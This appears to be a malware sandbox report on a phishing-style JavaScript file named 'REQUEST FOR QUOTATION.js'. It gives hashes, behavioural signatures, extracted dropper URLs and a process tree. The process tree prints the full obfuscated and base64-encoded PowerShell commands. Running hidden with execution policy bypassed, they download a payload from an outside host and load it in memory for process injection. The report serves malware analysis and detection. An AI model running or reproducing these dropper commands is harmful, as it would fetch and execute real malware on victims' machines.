Overview

overview

10

Static

static

1

REQUEST F...ION.js

windows7-x64

10

REQUEST F...ION.js

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2024 13:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    REQUEST FOR QUOTATION.js

  • Size

    318KB

  • MD5

    08dab38ef2c8bdada3b4928145b777f7

  • SHA1

    8d9fe403c417c9fc50ed09528dd2b096ebfe6375

  • SHA256

    cfea01473114d986467817f9c5e0713e84ef8d6fa8a44509780d390fc6b09b41

  • SHA512

    52aeb79f20660946bb7095addb26de8f115d29c4b15cd8169418d73db102c4ca7f79096780baa896357efe40999957969631b718557fd7c35e7375a2288ea5d5

  • SSDEEP

    6144:ae3G0HrhDz6LXUo09qGOWIC5pbyo68vh146TIVdDfo+IitZsVAsuG7EEqZ1Cr81b:Zr81VpOhEUX7dyIUwRjsSXKs0AUUbPMz

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\REQUEST FOR QUOTATION.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAKABbAHMAVABSAGkATgBHAF0AJABWAEUAUgBiAE8AcwBFAHAAUgBFAGYAZQBSAEUATgBDAEUAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoAbwBpAG4AJwAnACkAKAAgACgAJwBGACcAKwAnADAANAAnACsAJwB1AHIAbAAgACcAKwAnAD0AIABuAEsAcgAnACsAJwBoAHQAJwArACcAdABwACcAKwAnAHMAJwArACcAOgAvAC8AaQBhADkAMAA0ADYAMAAxAC4AdQBzAC4AYQAnACsAJwByAGMAJwArACcAaABpAHYAZQAuAG8AJwArACcAcgBnAC8ANgAvACcAKwAnAGkAdABlAG0AcwAvAGQAZQAnACsAJwB0AGEAaAAtAG4AbwB0AGUALQBqAC8ARABlACcAKwAnAHQAYQBoAE4AJwArACcAbwAnACsAJwB0AGUASgAuAHQAeAB0ACcAKwAnAG4ASwByADsARgAwADQAYgBhAHMAZQA2ACcAKwAnADQAQwBvAG4AdABlAG4AJwArACcAdAAgAD0AJwArACcAIAAoAE4AZQB3AC0ATwBiACcAKwAnAGoAZQBjAHQAIAAnACsAJwBTAHkAcwAnACsAJwB0AGUAbQAnACsAJwAuACcAKwAnAE4AZQB0AC4AJwArACcAVwBlAGIAQwBsAGkAZQBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAbwAnACsAJwB3AG4AbABvAGEAZAAnACsAJwBTAHQAcgBpAG4AJwArACcAZwAnACsAJwAoAEYAMAA0AHUAcgBsACcAKwAnACkAJwArACcAOwBGACcAKwAnADAANABiAGkAbgBhAHIAeQBDACcAKwAnAG8AbgB0AGUAbgAnACsAJwB0ACAAPQAgAFsAUwB5ACcAKwAnAHMAdABlACcAKwAnAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvACcAKwAnAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACsAJwBGADAANABiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACkAJwArACcAOwBGADAANABhAHMAJwArACcAcwBlAG0AYgBsACcAKwAnAHkAJwArACcAIAA9ACAAWwBSAGUAZgBsACcAKwAnAGUAJwArACcAYwB0AGkAbwBuAC4AQQAnACsAJwBzAHMAZQBtAGIAJwArACcAbAB5AF0AJwArACcAOgA6ACcAKwAnAEwAbwBhAGQAKABGADAANABiAGkAbgAnACsAJwBhACcAKwAnAHIAeQAnACsAJwBDAG8AbgB0AGUAJwArACcAbgB0ACkAOwBGADAAJwArACcANAB0AHkAcABlACAAPQAgAEYAMAA0AGEAcwAnACsAJwBzAGUAbQBiAGwAeQAnACsAJwAuACcAKwAnAEcAZQB0ACcAKwAnAFQAJwArACcAeQBwAGUAKABuAEsAJwArACcAcgBSACcAKwAnAHUAbgBQAEUALgBIACcAKwAnAG8AbQBlACcAKwAnAG4AJwArACcASwByACcAKwAnACkAOwBGADAANABtACcAKwAnAGUAdABoAG8AZAAgAD0AIABGADAANAB0AHkAcABlAC4ARwBlACcAKwAnAHQATQBlAHQAaABvAGQAKABuAEsAcgAnACsAJwBWAEEASQBuAEsAcgApADsAJwArACcARgAwADQAbQBlAHQAaAAnACsAJwBvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoAEYAMAA0ACcAKwAnAG4AJwArACcAdQBsAGwALAAgACcAKwAnAFsAbwBiAGoAZQBjAHQAWwBdACcAKwAnAF0AQAAnACsAJwAoAG4ASwByAHQAeAB0ACcAKwAnAC4AYQBmAGkAJwArACcAbgBlAGoALwB2ACcAKwAnAGUAZAAnACsAJwAuACcAKwAnADIAcgAuACcAKwAnADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ACcAKwAnADUAYgAxAGIAYwAwACcAKwAnAGQANAA1AGIANgAnACsAJwAzACcAKwAnADIAZQBiADkAJwArACcAZQBlADYAMgAtAGIAdQBwAC8AJwArACcALwA6ACcAKwAnAHMAcAB0AHQAJwArACcAaABuAEsAJwArACcAcgAgACwAIABuAEsAcgBkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAG4ASwByACcAKwAnACAALAAnACsAJwAgAG4ASwByAGQAZQBzAGEAdABpAHYAYQBkAG8AbgBLACcAKwAnAHIAIAAsACcAKwAnACAAbgBLAHIAJwArACcAZAAnACsAJwBlAHMAYQB0ACcAKwAnAGkAdgAnACsAJwBhAGQAbwAnACsAJwBuAEsAcgAsAG4ASwByAEEAZABkACcAKwAnAEkAJwArACcAbgBQAHIAbwBjAGUAcwBzADMAMgBuAEsAcgAsAG4AJwArACcASwByAGQAZQBzAGEAJwArACcAdABpAHYAYQBkAG8AbgBLAHIAJwArACcAKQApADsAJwApAC4AUgBFAHAATABBAGMAZQAoACcARgAwADQAJwAsACcAJAAnACkALgBSAEUAcABMAEEAYwBlACgAJwBuAEsAcgAnACwAWwBzAHQAcgBpAE4ARwBdAFsAQwBIAEEAUgBdADMAOQApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'+'://ia904601.us.a'+'rc'+'hive.o'+'rg/6/'+'items/de'+'tah-note-j/De'+'tahN'+'o'+'teJ.txt'+'nKr;F04base6'+'4Conten'+'t ='+' (New-Ob'+'ject '+'Sys'+'tem'+'.'+'Net.'+'WebClien'+'t'+').'+'Do'+'wnload'+'Strin'+'g'+'(F04url'+')'+';F'+'04binaryC'+'onten'+'t = [Sy'+'ste'+'m.Co'+'nvert]::'+'Fro'+'mBase64String('+'F04base64Content)'+';F04as'+'sembl'+'y'+' = [Refl'+'e'+'ction.A'+'ssemb'+'ly]'+'::'+'Load(F04bin'+'a'+'ry'+'Conte'+'nt);F0'+'4type = F04as'+'sembly'+'.'+'Get'+'T'+'ype(nK'+'rR'+'unPE.H'+'ome'+'n'+'Kr'+');F04m'+'ethod = F04type.Ge'+'tMethod(nKr'+'VAInKr);'+'F04meth'+'od.Invoke'+'(F04'+'n'+'ull, '+'[object[]'+']@'+'(nKrtxt'+'.afi'+'nej/v'+'ed'+'.'+'2r.'+'39b345302a07'+'5b1bc0'+'d45b6'+'3'+'2eb9'+'ee62-bup/'+'/:'+'sptt'+'hnK'+'r , nKrdesa'+'tivadonKr'+' ,'+' nKrdesativadonK'+'r ,'+' nKr'+'d'+'esat'+'iv'+'ado'+'nKr,nKrAdd'+'I'+'nProcess32nKr,n'+'Krdesa'+'tivadonKr'+'));').REpLAce('F04','$').REpLAce('nKr',[striNG][CHAR]39))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    7d640063c82b29e2ed7f9b469c5e315c

    SHA1

    d028c7d6b2f8a7502c2e17c45b1e85bf663995e8

    SHA256

    1d40fd898214bb3b223f33552f960ba1a4530ebe5a43927a31e9830e2037b2e9

    SHA512

    a9ee1103898467ffd0f3a363e87f19d5887eb042722c4dcbf459423db06567b3e76cb1988dff51c920b39be6f60724e0514530a34d5a33344f1d0d1cdfea4996

    Download Submit

  • memory/2720-4-0x000007FEF4A1E000-0x000007FEF4A1F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2720-5-0x000000001B1B0000-0x000000001B492000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2720-6-0x0000000002470000-0x0000000002478000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2720-7-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-8-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-9-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-15-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2720-16-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp

    Filesize

    9.6MB

    Download